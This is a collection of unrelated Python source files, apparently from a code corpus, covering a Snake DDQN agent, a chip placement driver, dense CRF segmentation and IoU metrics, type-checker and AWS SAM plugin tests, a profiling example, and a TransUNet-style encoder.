total_step = 0
scores = []
while True:
if total_run_limit is not None and run >= total_run_limit:
print ("Reached total run limit of: " + str(total_run_limit))
exit(0)
run += 1
env = self.prepare_training_environment()
current_state = env.state()
step = 0
score = env.reward()
while True:
if total_step >= total_step_limit:
print ("Reached total step limit of: " + str(total_step_limit))
exit(0)
total_step += 1
step += 1
action = self._predict_move(current_state)
action_vector = Action.action_from_vector(action)
normalized_action = Action.normalized_action(env.snake_action, action_vector)
next_state, reward, terminal = env.full_step(normalized_action)
if clip:
np.sign(reward)
score += reward
self._remember(current_state, action, reward, next_state, terminal)
current_state = next_state
self._step_update(total_step)
if terminal:
scores.append(score)
if len(scores) % SCORE_LOGGING_FREQUENCY == 0:
self.log_score(mean(scores))
print('{{"metric": "score", "value": {}}}'.format(mean(scores)))
print('{{"metric": "run", "value": {}}}'.format(run))
scores = []
break
def _predict_move(self, state):
if np.random.rand() < self.epsilon or len(self.memory) < REPLAY_START_SIZE:
return random.randrange(self.action_space)
q_values = self.ddqn.predict(np.expand_dims(np.asarray(state).astype(np.float64), axis=0), batch_size=1)
return np.argmax(q_values[0])
def _remember(self, current_state, action, reward, next_state, terminal):
self.memory.append({"current_state": np.asarray(current_state),
"action": action,
"reward": reward,
"next_state": np.asarray(next_state),
"terminal": terminal})
if len(self.memory) > MEMORY_SIZE:
self.memory.pop(0)
def _step_update(self, total_step):
if total_step < REPLAY_START_SIZE:
return
if total_step % TRAINING_FREQUENCY == 0:
loss, accuracy, average_max_q = self._train()
if total_step % LEARNING_LOGGING_FREQUENCY == 0:
#TODO: batch and average these values
print('{{"metric": "loss", "value": {}}}'.format(loss))
print('{{"metric": "accuracy", "value": {}}}'.format(accuracy))
print('{{"metric": "q", "value": {}}}'.format(average_max_q))
self._update_epsilon()
if total_step % MODEL_PERSISTENCE_UPDATE_FREQUENCY == 0:
print('{{"metric": "epsilon", "value": {}}}'.format(self.epsilon))
print('{{"metric": "total_step", "value": {}}}'.format(total_step))
self._save_model()
if total_step % TARGET_NETWORK_UPDATE_FREQUENCY == 0:
self._reset_target_network()
def _train(self):
batch = np.asarray(random.sample(self.memory, BATCH_SIZE))
if len(batch) < BATCH_SIZE:
return
current_states = []
q_values = []
max_q_values = []
for entry in batch:
current_state = np.expand_dims(np.asarray(entry["current_state"]).astype(np.float64), axis=0)
current_states.append(current_state)
next_state = np.expand_dims(np.asarray(entry["next_state"]).astype(np.float64), axis=0)
next_state_prediction = self.ddqn_target.predict(next_state).ravel()
next_q_value = np.max(next_state_prediction)
q = list(self.ddqn.predict(current_state)[0])
if entry["terminal"]:
q[entry["action"]] = entry["reward"]
else:
q[entry["action"]] = entry["reward"] + GAMMA * next_q_value
q_values.append(q)
max_q_values.append(np.max(q))
fit = self.ddqn.fit(np.asarray(current_states).squeeze(),
np.asarray(q_values).squeeze(),
batch_size=BATCH_SIZE,
verbose=0)
loss = fit.history["loss"][0]
accuracy = fit.history["accuracy"][0]
return loss, accuracy, mean(max_q_values)
def _update_epsilon(self):
self.epsilon -= EXPLORATION_DECAY
self.epsilon = max(EXPLORATION_MIN, self.epsilon)
def _reset_target_network(self):
self.ddqn_target.set_weights(self.ddqn.get_weights())
|
##
# @file Placer.py
# @author Yibo Lin
# @date Apr 2018
# @brief Main file to run the entire placement flow.
#
import matplotlib
matplotlib.use('Agg')
import os
import sys
import time
import numpy as np
import Params
import PlaceDB
import NonLinearPlace
import pdb
def place(params):
"""
@brief Top API to run the entire placement flow.
@param params parameters
"""
np.random.seed(params.random_seed)
# read database
tt = time.time()
placedb = PlaceDB.PlaceDB()
placedb(params)
print("[I] reading database takes %.2f seconds" % (time.time()-tt))
#placedb.write_nets(params, "tmp.nets")
# solve placement
tt = time.time()
placer = NonLinearPlace.NonLinearPlace(params, placedb)
print("[I] non-linear placement initialization takes %.2f seconds" % (time.time()-tt))
metrics = placer(params, placedb)
print("[I] non-linear placement takes %.2f seconds" % (time.time()-tt))
# write placement solution
path = "%s/%s" % (params.result_dir, os.path.splitext(os.path.basename(params.aux_file))[0])
if not os.path.exists(path):
os.system("mkdir -p %s" % (path))
gp_out_file = os.path.join(path, os.path.basename(params.aux_file).replace(".aux", ".gp.pl"))
placedb.write_pl(params, gp_out_file)
# call external detailed placement
if params.detailed_place_engine and os.path.exists(params.detailed_place_engine):
print("[I] Use external detailed placement engine %s" % (params.detailed_place_engine))
dp_out_file = gp_out_file.replace(".gp.pl", "")
# add target density constraint if provided
target_density_cmd = ""
if params.target_density < 1.0:
target_density_cmd = " -util %f" % (params.target_density)
if params.legalize_flag:
legalize = "-nolegal"
else:
legalize = ""
if params.detailed_place_flag:
detailed_place = "-nodetail"
else:
detailed_place = ""
cmd = "%s -aux %s -loadpl %s %s -out %s -noglobal %s %s" % (params.detailed_place_engine, params.aux_file, gp_out_file, target_density_cmd, dp_out_file, legalize, detailed_place)
print("[I] %s" % (cmd))
tt = time.time()
os.system(cmd)
print("[I] detailed placement takes %.2f seconds" % (time.time()-tt))
if params.plot_flag:
# read solution and evaluate
placedb.read_pl(dp_out_file+".ntup.pl")
placedb.scale_pl(params.scale_factor)
iteration = len(metrics)
pos = placer.init_pos
pos[0:placedb.num_physical_nodes] = placedb.node_x
pos[placedb.num_nodes:placedb.num_nodes+placedb.num_physical_nodes] = placedb.node_y
hpwl, density_overflow, max_density = placer.validate(placedb, pos, iteration)
print("[I] iteration %4d, HPWL %.3E, overflow %.3E, max density %.3E" % (iteration, hpwl, density_overflow, max_density))
placer.plot(params, placedb, iteration, pos)
elif params.detailed_place_engine:
print("[W] External detailed placement engine %s NOT found" % (params.detailed_place_engine))
if __name__ == "__main__":
"""
@brief main function to invoke the entire placement flow.
"""
params = Params.Params()
params.printWelcome()
if len(sys.argv) == 1 or '-h' in sys.argv[1:] or '--help' in sys.argv[1:]:
params.printHelp()
exit()
elif len(sys.argv) != 2:
print("[E] One input parameters in json format in required")
params.printHelp()
exit()
# load parameters
params.load(sys.argv[1])
print("[I] parameters = %s" % (params))
# run placement
tt = time.time()
place(params)
print("[I] placement takes %.3f seconds" % (time.time()-tt))
|
from __future__ import print_function
import cv2
import matplotlib.pyplot as plt
from skimage.color import rgb2gray
from skimage.color import gray2rgb
from pydensecrf.utils import unary_from_labels, create_pairwise_bilateral, create_pairwise_gaussian, unary_from_softmax
from skimage.io import imread, imsave
from six.moves import xrange
import datetime
from PIL import Image
import tensorflow as tf
import time
import numpy as np
import scipy.misc as misc
import pydensecrf.densecrf as dcrf
import denseCRF
def _read_annotation(filename):
annotation = np.expand_dims(_transform(filename), axis=3)
return annotation
def _transform(filename):
# 1. read image
image = misc.imread(filename)
resize_image = misc.imresize(image, [224, 224], interp='nearest')
return np.array(resize_image)
def dense_crf(original_image, annotated_image, NUM_OF_CLASSESS, use_2d=True):
# Converting annotated image to RGB if it is Gray scale
print(original_image.shape, annotated_image.shape)
# Gives no of class labels in the annotated image
#n_labels = len(set(labels.flat))
n_labels = NUM_OF_CLASSESS
# Setting up the CRF model
d = dcrf.DenseCRF2D(
original_image.shape[1], original_image.shape[0], n_labels)
# get unary potentials (neg log probability)
processed_probabilities = annotated_image
softmax = processed_probabilities.transpose((2, 0, 1))
print(softmax.shape)
U = unary_from_softmax(softmax, scale=None, clip=1e-5)
U = np.ascontiguousarray(U)
#U = unary_from_labels(labels, n_labels, gt_prob=0.7, zero_unsure=False)
d.setUnaryEnergy(U)
# This potential penalizes small pieces of segmentation that are
# spatially isolated -- enforces more spatially consistent segmentations
feats = create_pairwise_gaussian(
sdims=(3, 3), shape=original_image.shape[:2])
d.addPairwiseEnergy(feats, compat=3,
kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# This creates the color-dependent features --
# because the segmentation that we get from CNN are too coarse
# and we can use local color features to refine them
feats = create_pairwise_bilateral(sdims=(80, 80), schan=(13, 13, 13),
img=original_image, chdim=2)
d.addPairwiseEnergy(feats, compat=10,
kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# Run Inference for 5 steps
Q = d.inference(5)
print(Q)
#print(">>>>>>>>Qshape: ", Q.shape)
# Find out the most probable class for each pixel.
output = np.argmax(Q, axis=0).reshape(
(original_image.shape[0], original_image.shape[1]))
print(output.shape)
plt.subplot(240 + 1)
plt.imshow(output, cmap=plt.get_cmap('nipy_spectral'))
plt.show()
return output
def crf(original_image, annotated_image, NUM_OF_CLASSESS, use_2d=True):
# Converting annotated image to RGB if it is Gray scale
# print("crf function")
print(original_image.shape, annotated_image.shape)
# Converting the annotations RGB color to single 32 bit integer
annotated_label = annotated_image[:,
:,
0] + (annotated_image[:,
:,
1] << 8) + (annotated_image[:,
:,
2] << 16)
# Convert the 32bit integer color to 0, 1, 2, ... labels.
colors, labels = np.unique(annotated_image, return_inverse=True)
# Creating a mapping back to 32 bit colors
colorize = np.empty((len(colors), 3), np.uint8)
colorize[:, 0] = (colors & 0x0000FF)
colorize[:, 1] = (colors & 0x00FF00) >> 8
colorize[:, 2] = (colors & 0xFF0000) >> 16
# Gives no of class labels in the annotated image
n_labels = NUM_OF_CLASSESS
# print("No of labels in the Image are ")
# Setting up the CRF model
if use_2d:
d = dcrf.DenseCRF2D(
original_image.shape[1],
original_image.shape[0],
n_labels)
# get unary potentials (neg log probability)
processed_probabilities = annotated_image
softmax = processed_probabilities.transpose((2, 0, 1))
U = unary_from_softmax(softmax)
# U = unary_from_labels(labels, n_labels, gt_prob=0.7, zero_unsure=False)
d.setUnaryEnergy(U)
# This adds the color-independent term, features are the locations
# only.
d.addPairwiseGaussian(sxy=(3, 3), compat=3, kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# This adds the color-dependent term, i.e. features are (x,y,r,g,b).
d.addPairwiseBilateral(
sxy=(
10,
10),
srgb=(
13,
13,
13),
rgbim=original_image,
compat=10,
kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# Run Inference for 5 steps
Q = d.inference(20)
# Find out the most probable class for each pixel.
MAP = np.argmax(Q, axis=0)
# Convert the MAP (labels) back to the corresponding colors and save the image.
# Note that there is no "unknown" here anymore, no matter what we had at
# first.
MAP = colorize[MAP, :]
# Get output
output = MAP.reshape(original_image.shape)
output = rgb2gray(output)
print(output.shape)
plt.plot(output)
#plt.imshow(crfoutput, cmap=plt.get_cmap('nipy_spectral'))
plt.show()
return MAP.reshape(original_image.shape), output
"""
Function which returns the labelled image after applying CRF
"""
# Original_image = Image which has to labelled
# Annotated image = Which has been labelled by some technique( FCN in this case)
# Output_image = The final output image after applying CRF
# Use_2d = boolean variable
# if use_2d = True specialised 2D fucntions will be applied
# else Generic functions will be applied
def image_crf(original_image, annotated_image, output_image, use_2d=True):
# Converting annotated image to RGB if it is Gray scale
if(len(annotated_image.shape) < 3):
annotated_image = gray2rgb(annotated_image)
imsave("testing2.png", annotated_image)
# Converting the annotations RGB color to single 32 bit integer
annotated_label = annotated_image[:, :, 0] + (
annotated_image[:, :, 1] << 8) + (annotated_image[:, :, 2] << 16)
# Convert the 32bit integer color to 0,1, 2, ... labels.
colors, labels = np.unique(annotated_label, return_inverse=True)
# Creating a mapping back to 32 bit colors
colorize = np.empty((len(colors), 3), np.uint8)
colorize[:, 0] = (colors & 0x0000FF)
colorize[:, 1] = (colors & 0x00FF00) >> 8
colorize[:, 2] = (colors & 0xFF0000) >> 16
# Gives no of class labels in the annotated image
n_labels = len(set(labels.flat))
print("No of labels in the Image are ")
print(n_labels)
# Setting up the CRF model
if use_2d:
d = dcrf.DenseCRF2D(
original_image.shape[1], original_image.shape[0], n_labels)
# get unary potentials (neg log probability)
U = unary_from_labels(labels, n_labels, gt_prob=0.7, zero_unsure=False)
d.setUnaryEnergy(U)
# This adds the color-independent term, features are the locations only.
d.addPairwiseGaussian(sxy=(3, 3), compat=3, kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# This adds the color-dependent term, i.e. features are (x,y,r,g,b).
d.addPairwiseBilateral(sxy=(80, 80), srgb=(13, 13, 13), rgbim=original_image,
compat=10,
kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# Run Inference for 5 steps
Q = d.inference(5)
# Find out the most probable class for each pixel.
MAP = np.argmax(Q, axis=0)
# Convert the MAP (labels) back to the corresponding colors and save the image.
# Note that there is no "unknown" here anymore, no matter what we had at first.
MAP = colorize[MAP, :]
imsave(output_image, MAP.reshape(original_image.shape))
return MAP.reshape(original_image.shape)
def final_crf(original_image, annotated_image, NUM_OF_CLASSESS, use_2d=True):
# Converting annotated image to RGB if it is Gray scale
print(original_image.shape, annotated_image.shape)
# Gives no of class labels in the annotated image
#n_labels = len(set(labels.flat))
n_labels = NUM_OF_CLASSESS
# Setting up the CRF model
d = dcrf.DenseCRF2D(
original_image.shape[1], original_image.shape[0], n_labels)
# get unary potentials (neg log probability)
processed_probabilities = annotated_image
softmax = processed_probabilities.transpose((2, 0, 1))
print(softmax.shape)
U = unary_from_softmax(softmax, scale=None, clip=1e-5)
U = np.ascontiguousarray(U)
#U = unary_from_labels(labels, n_labels, gt_prob=0.7, zero_unsure=False)
d.setUnaryEnergy(U)
# This adds the color-independent term, features are the locations
# only.
d.addPairwiseGaussian(sxy=(3, 3), compat=3, kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# This adds the color-dependent term, i.e. features are (x,y,r,g,b).
d.addPairwiseBilateral(
sxy=(
80,
80),
srgb=(
13,
13,
13),
rgbim=original_image,
compat=10,
kernel=dcrf.DIAG_KERNEL,
normalization=dcrf.NORMALIZE_SYMMETRIC)
# Run Inference for 5 steps
Q = d.inference(5)
print(Q)
#print(">>>>>>>>Qshape: ", Q.shape)
# Find out the most probable class for each pixel.
output = np.argmax(Q, axis=0).reshape(
(original_image.shape[0], original_image.shape[1]))
print(output.shape)
plt.subplot(240 + 1)
plt.imshow(output, cmap=plt.get_cmap('nipy_spectral'))
plt.show()
return output
def _calcCrossMat(gtimage, predimage, num_classes):
crossMat = []
for i in range(num_classes):
crossMat.append([0] * num_classes)
# print(crossMat)
height, width = gtimage.shape
for y in range(height):
# print(crossMat)
for x in range(width):
gtlabel = gtimage[y, x]
predlabel = predimage[y, x]
if predlabel >= num_classes or gtlabel >= num_classes:
print('gt:%d, pr:%d' % (gtlabel, predlabel))
else:
crossMat[gtlabel][predlabel] = crossMat[gtlabel][predlabel] + 1
return crossMat
def _calc_eval_metrics(gtimage, predimage, num_classes):
pixel_accuracy_ = 0
mean_accuracy = 0
meanFrqWIoU = 0
meanIoU = 0
per_class_pixel_accuracy = []
IoUs = []
FrqWIoU = []
for i in range(num_classes):
IoUs.append([0] * num_classes)
FrqWIoU.append([0] * num_classes)
per_class_pixel_accuracy.append([0] * num_classes)
try:
height, width = gtimage.shape
pixel_sum = height * width
class_intersections = []
gt_pixels = []
#check_size(predimage, gtimage)
# Check classes
# gt_labels, gt_labels_count = extract_classes(gtimage)
# print(gt_labels)
# pred_labels, pred_labels_count = extract_classes(predimage)
# print(pred_labels)
# assert num_classes == gt_labels_count
# print(num_classes, gt_labels_count, pred_labels_count)
# assert gt_labels_count == pred_labels_count
for label in range(num_classes): # 0--> 17
intersection = 0
union = 0
gt_class = 0
for y in range(height): # 0->223
for x in range(width): # =-->223
gtlabel = gtimage[y, x]
predlabel = predimage[y, x]
if predlabel >= num_classes or gtlabel >= num_classes:
print('gt:%d, pr:%d' % (gtlabel, predlabel))
else:
if(gtlabel == label and predlabel == label):
intersection = intersection + 1
if(gtlabel == label or predlabel == label):
union = union + 1
if(gtlabel == label):
gt_class = gt_class + 1
# Calculate per class pixel accuracy
if (gt_class == 0):
per_class_pixel_accuracy[label] = 0
else:
per_class_pixel_accuracy[label] = (
float)(intersection / gt_class)
# Calculate per class IoU and FWIoU
if(union == 0):
IoUs[label] = 0.0
FrqWIoU[label] = 0.0
else:
IoUs[label] = (float)(intersection) / union
FrqWIoU[label] = (float)(intersection * gt_class) / union
class_intersections.append(intersection)
gt_pixels.append(gt_class)
# Check pixels
# assert pixel_sum == get_pixel_area(gtimage)
# assert pixel_sum == np.sum(gt_pixels)
# print(pixel_sum, get_pixel_area(gtimage), np.sum(gt_pixels))
# Calculate mean accuracy and meanIoU
mean_accuracy = np.mean(per_class_pixel_accuracy)
meanIoU = np.mean(IoUs)
# hist = _calcCrossMat(gtimage, predimage, num_classes)
# num_cor_pix = np.diag(hist)
# # num of correct pixels
# num_cor_pix = np.diag(hist)
# # num of gt pixels
# num_gt_pix = np.sum(hist, axis=1)
# # num of pred pixels
# num_pred_pix = np.sum(hist, axis=0)
# # IU
# denominator = (num_gt_pix + num_pred_pix - num_cor_pix)
# print(np.sum(class_intersections), np.sum(num_cor_pix))
# Calculate pixel accuracy and mean FWIoU
if (pixel_sum == 0):
pixel_accuracy_ = 0
meanFrqWIoU = 0
else:
pixel_accuracy_ = (float)(np.sum(class_intersections)) / pixel_sum
meanFrqWIoU = (float)(np.sum(FrqWIoU)) / pixel_sum
except Exception as err:
print(err)
return pixel_accuracy_, mean_accuracy, meanIoU, meanFrqWIoU
# input = _transform("in.png")
# input = np.ones((224, 224, 23))
# anno = _read_annotation("anno.png")
# anno = np.zeros((224, 224, 23))
# output = dense_crf(input, anno, 23)
# output = crf(input, anno, 23)
_, crfoutput = denseCRF.crf(
"inp.png", "pred.png", "output.png", 23, use_2d=True)
#crfoutput = misc.imread("output.png")
#crfoutput = misc.imresize(crfoutput, [224, 224])
print(crfoutput.shape)
#crfoutput = np.argmax(crfoutput, axis=2)
# print(np.array([crfoutput]).astype(np.uint8))
#crfoutput = cv2.normalize(crfoutput, None, 0, 255, cv2.NORM_MINMAX)
print(np.unique(crfoutput))
gtimage = misc.imread("pred.png")
#gtimage = cv2.normalize(gtimage, None, 0, 255, cv2.NORM_MINMAX)
print(gtimage.shape)
print(np.unique(gtimage))
# crossmat = _calcCrossMat(gtimage, crfoutput.astype(np.uint8), 23)
# print(crossmat)
print(_calc_eval_metrics(gtimage.astype(np.uint8), crfoutput.astype(np.uint8), 23))
|
# This sample tests various forms of subscript expressions for
# syntax and semantic (type) errors.
from typing import List, TypeVar
_T = TypeVar("_T", list, tuple)
def func1(p1: List[int], p2: _T):
a1 = p1[0]
reveal_type(a1, expected_text="int")
a2 = p1[:]
reveal_type(a2, expected_text="list[int]")
a3 = p1[1:]
reveal_type(a3, expected_text="list[int]")
a4 = p1[1:2]
reveal_type(a4, expected_text="list[int]")
a5 = p1[0:1:3]
reveal_type(a5, expected_text="list[int]")
a6 = p1[:3]
reveal_type(a6, expected_text="list[int]")
a7 = p1[::]
reveal_type(a7, expected_text="list[int]")
a8 = p1[::2]
reveal_type(a8, expected_text="list[int]")
# This should generate a syntax error.
b1 = p1[0:1:3:4]
# This should generate a syntax error.
b2 = p1[0:::]
# This should generate a type error.
c1 = p1[:,]
reveal_type(c1, expected_text="Unknown")
# This should generate a type error.
c2 = p1[:,:]
reveal_type(c2, expected_text="Unknown")
# This should generate a type error.
c3 = p1[1,]
reveal_type(c3, expected_text="Unknown")
d1 = p2[0]
reveal_type(d1, expected_text="Unknown")
|
from unittest import TestCase
from mock import Mock, MagicMock, patch, call
from samtranslator.plugins import BasePlugin
from samtranslator.model.function_policies import PolicyTypes, PolicyEntry
from samtranslator.model.exceptions import InvalidResourceException
from samtranslator.plugins.policies.policy_templates_plugin import PolicyTemplatesForFunctionPlugin
from samtranslator.policy_template_processor.exceptions import InsufficientParameterValues, InvalidParameterValues
class TestPolicyTemplatesForFunctionPlugin(TestCase):
def setUp(self):
self._policy_template_processor_mock = Mock()
self.plugin = PolicyTemplatesForFunctionPlugin(self._policy_template_processor_mock)
def test_plugin_must_setup_correct_name(self):
# Name is the class name
expected_name = "PolicyTemplatesForFunctionPlugin"
self.assertEqual(self.plugin.name, expected_name)
def test_plugin_must_be_instance_of_base_plugin_class(self):
self.assertTrue(isinstance(self.plugin, BasePlugin))
def test_must_only_support_function_resource(self):
function_type = "AWS::Serverless::Function"
self.assertTrue(self.plugin._is_supported(function_type))
def test_must_not_support_non_function_resources(self):
resource_type = "AWS::Serverless::Api"
self.assertFalse(self.plugin._is_supported(resource_type))
@patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
def test_on_before_transform_resource_must_work_on_every_policy_template(self, function_policies_class_mock):
is_supported_mock = Mock()
self.plugin._is_supported = is_supported_mock
is_supported_mock.return_value = True
function_policies_obj_mock = MagicMock()
function_policies_class_mock.return_value = function_policies_obj_mock
function_policies_class_mock.POLICIES_PROPERTY_NAME = "Policies"
template1 = {
"MyTemplate1": {
"Param1": "value1"
}
}
template2 = {
"MyTemplate2": {
"Param2": "value2"
}
}
resource_properties = {
"Policies": [template1, template2]
}
policies = [
PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE),
PolicyEntry(data=template2, type=PolicyTypes.POLICY_TEMPLATE),
]
# Setup to return all the policies
function_policies_obj_mock.__len__.return_value = 2
function_policies_obj_mock.get.return_value = iter(policies)
# These are the values returned on every call to `convert` method
self._policy_template_processor_mock.convert.side_effect = [
{"Statement1": {"key1": "value1"}},
{"Statement2": {"key2": "value2"}},
]
expected = [{"Statement1": {"key1": "value1"}}, {"Statement2": {"key2": "value2"}}]
self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
# This will overwrite the resource_properties input array
self.assertEqual(expected, resource_properties["Policies"])
function_policies_obj_mock.get.assert_called_once_with()
self._policy_template_processor_mock.convert.assert_has_calls([
call("MyTemplate1", {"Param1": "value1"}),
call("MyTemplate2", {"Param2": "value2"})
])
@patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
def test_on_before_transform_resource_must_skip_non_policy_templates(self, function_policies_class_mock):
is_supported_mock = Mock()
self.plugin._is_supported = is_supported_mock
is_supported_mock.return_value = True
function_policies_obj_mock = MagicMock()
function_policies_class_mock.return_value = function_policies_obj_mock
function_policies_class_mock.POLICIES_PROPERTY_NAME = "Policies"
template1 = {
"MyTemplate1": {
"Param1": "value1"
}
}
template2 = {
"MyTemplate2": {
"Param2": "value2"
}
}
regular_policy = {"regular policy": "something"}
resource_properties = {
"Policies": [template1, regular_policy, template2]
}
policies = [
PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE),
PolicyEntry(data=regular_policy, type=PolicyTypes.MANAGED_POLICY),
PolicyEntry(data=template2, type=PolicyTypes.POLICY_TEMPLATE),
]
# Setup to return all the policies
function_policies_obj_mock.__len__.return_value = 3
function_policies_obj_mock.get.return_value = iter(policies)
# These are the values returned on every call to `convert` method
self._policy_template_processor_mock.convert.side_effect = [
{"Statement1": {"key1": "value1"}},
{"Statement2": {"key2": "value2"}},
]
expected = [{"Statement1": {"key1": "value1"}}, {"regular policy": "something"}, {"Statement2": {"key2": "value2"}}]
self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
# This will overwrite the resource_properties input array
self.assertEqual(expected, resource_properties["Policies"])
function_policies_obj_mock.get.assert_called_once_with()
self._policy_template_processor_mock.convert.assert_has_calls([
call("MyTemplate1", {"Param1": "value1"}),
call("MyTemplate2", {"Param2": "value2"})
])
@patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
def test_on_before_transform_must_raise_on_insufficient_parameter_values(self, function_policies_class_mock):
is_supported_mock = Mock()
self.plugin._is_supported = is_supported_mock
is_supported_mock.return_value = True
function_policies_obj_mock = MagicMock()
function_policies_class_mock.return_value = function_policies_obj_mock
template1 = {
"MyTemplate1": {
"Param1": "value1"
}
}
resource_properties = {
"Policies": template1
}
policies = [
PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE)
]
# Setup to return all the policies
function_policies_obj_mock.__len__.return_value = 1
function_policies_obj_mock.get.return_value = iter(policies)
# These are the values returned on every call to `convert` method
self._policy_template_processor_mock.convert.side_effect = InsufficientParameterValues("message")
with self.assertRaises(InvalidResourceException):
self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
# Make sure the input was not changed
self.assertEqual(resource_properties, {"Policies": {"MyTemplate1": { "Param1": "value1"}}})
@patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
def test_on_before_transform_must_raise_on_invalid_parameter_values(self, function_policies_class_mock):
is_supported_mock = Mock()
self.plugin._is_supported = is_supported_mock
is_supported_mock.return_value = True
function_policies_obj_mock = MagicMock()
function_policies_class_mock.return_value = function_policies_obj_mock
template1 = {
"MyTemplate1": {
"Param1": "value1"
}
}
resource_properties = {
"Policies": template1
}
policies = [
PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE)
]
# Setup to return all the policies
function_policies_obj_mock.__len__.return_value = 1
function_policies_obj_mock.get.return_value = iter(policies)
self._policy_template_processor_mock.convert.side_effect = InvalidParameterValues("message")
with self.assertRaises(InvalidResourceException):
self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
# Make sure the input was not changed
self.assertEqual(resource_properties, {"Policies": {"MyTemplate1": { "Param1": "value1"}}})
@patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
def test_on_before_transform_must_bubble_exception(self, function_policies_class_mock):
is_supported_mock = Mock()
self.plugin._is_supported = is_supported_mock
is_supported_mock.return_value = True
function_policies_obj_mock = MagicMock()
function_policies_class_mock.return_value = function_policies_obj_mock
template1 = {
"MyTemplate1": {
"Param1": "value1"
}
}
resource_properties = {
"Policies": template1
}
policies = [
PolicyEntry(data=template1, type=PolicyTypes.POLICY_TEMPLATE)
]
# Setup to return all the policies
function_policies_obj_mock.__len__.return_value = 1
function_policies_obj_mock.get.return_value = iter(policies)
self._policy_template_processor_mock.convert.side_effect = TypeError('message')
with self.assertRaises(TypeError):
self.plugin.on_before_transform_resource("logicalId", "resource_type", resource_properties)
# Make sure the input was not changed
self.assertEqual(resource_properties, {"Policies": {"MyTemplate1": { "Param1": "value1"}}})
def test_on_before_transform_resource_must_skip_unsupported_resources(self):
is_supported_mock = Mock()
data_mock = Mock()
self.plugin._is_supported = is_supported_mock
is_supported_mock.return_value = False
self.plugin.on_before_transform_resource(data_mock, data_mock, data_mock)
# Make sure none of the data elements were accessed, because the method returned immediately
self.assertEqual([], data_mock.method_calls)
@patch("samtranslator.plugins.policies.policy_templates_plugin.FunctionPolicies")
def test_on_before_transform_resource_must_skip_function_with_no_policies(self, function_policies_class_mock):
is_supported_mock = Mock()
self.plugin._is_supported = is_supported_mock
is_supported_mock.return_value = True
function_policies_obj_mock = MagicMock()
function_policies_class_mock.return_value = function_policies_obj_mock
# Setup to return NO policies
function_policies_obj_mock.__len__.return_value = 0
self.plugin.on_before_transform_resource("logicalId", "resource_type", {})
# Since length was zero, get() should never be called
function_policies_obj_mock.get.assert_not_called()
|
"""This is just a simple example for testing cprofilev. To see cprofilev in
action, run
python -m cprofilev example_for_profiling.py
"""
import random
import time
def product(x, y):
return x * y
def main():
x = 1.
while True:
x = product(x, 0.5 + random.random())
time.sleep(0.1)
if __name__ == '__main__':
main()
|
import torch
import torch.nn as nn
from einops import rearrange
from utils.vit import ViT
class EncoderBottleneck(nn.Module):
def __init__(self, in_channels, out_channels, stride=1, base_width=64):
super().__init__()
self.downsample = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(out_channels)
)
width = int(out_channels * (base_width / 64))
self.conv1 = nn.Conv2d(in_channels, width, kernel_size=1, stride=1, bias=False)
self.norm1 = nn.BatchNorm2d(width)
self.conv2 = nn.Conv2d(width, width, kernel_size=3, stride=2, groups=1, padding=1, dilation=1, bias=False)
self.norm2 = nn.BatchNorm2d(width)
self.conv3 = nn.Conv2d(width, out_channels, kernel_size=1, stride=1, bias=False)
self.norm3 = nn.BatchNorm2d(out_channels)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_down = self.downsample(x)
x = self.conv1(x)
x = self.norm1(x)
x = self.relu(x)
x = self.conv2(x)
x = self.norm2(x)
x = self.relu(x)
x = self.conv3(x)
x = self.norm3(x)
x = x + x_down
x = self.relu(x)
return x
class DecoderBottleneck(nn.Module):
def __init__(self, in_channels, out_channels, scale_factor=2):
super().__init__()
self.upsample = nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=True)
self.layer = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True)
)
def forward(self, x, x_concat=None):
x = self.upsample(x)
if x_concat is not None:
x = torch.cat([x_concat, x], dim=1)
x = self.layer(x)
return x
class Encoder(nn.Module):
def __init__(self, img_dim, in_channels, out_channels, head_num, mlp_dim, block_num, patch_dim):
super().__init__()
self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=7, stride=2, padding=3, bias=False)
self.norm1 = nn.BatchNorm2d(out_channels)
self.relu = nn.ReLU(inplace=True)
self.encoder1 = EncoderBottleneck(out_channels, out_channels * 2, stride=2)
self.encoder2 = EncoderBottleneck(out_channels * 2, out_channels * 4, stride=2)
self.encoder3 = EncoderBottleneck(out_channels * 4, out_channels * 8, stride=2)
self.vit_img_dim = img_dim // patch_dim
self.vit = ViT(self.vit_img_dim, out_channels * 8, out_channels * 8,
head_num, mlp_dim, block_num, patch_dim=1, classification=False)
self.conv2 = nn.Conv2d(out_channels * 8, 512, kernel_size=3, stride=1, padding=1)
self.norm2 = nn.BatchNorm2d(512)
def forward(self, x):
x = self.conv1(x)
x = self.norm1(x)
x1 = self.relu(x)
